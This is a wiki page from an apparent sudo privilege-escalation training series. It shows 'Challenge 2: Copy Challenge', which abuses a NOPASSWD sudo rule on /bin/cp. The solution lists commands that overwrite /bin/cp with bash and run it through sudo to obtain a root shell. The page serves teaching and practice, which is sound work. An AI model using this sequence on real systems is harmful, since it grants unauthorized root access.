-
Notifications
You must be signed in to change notification settings - Fork 2
Challenge 2: Copy Challenge
Bob Micheletto edited this page Feb 20, 2023
·
4 revisions
Level: Easy
Sudo Rule: localuser2 ALL=(ALL) NOPASSWD: /bin/cp
Notes: If you can place an arbitrary root owned file anywhere on the system, you can gain access in a myriad of ways. In this case, one can overwrite the cp command with a shell script that runs a shell, and then just run that as root. This sets up several variations on the copying theme.
Solution:
sudo -l
cp /bin/cp /tmp
sudo cp -f /bin/bash /bin/cp
sudo cp
id
mv /tmp/cp /bin/cp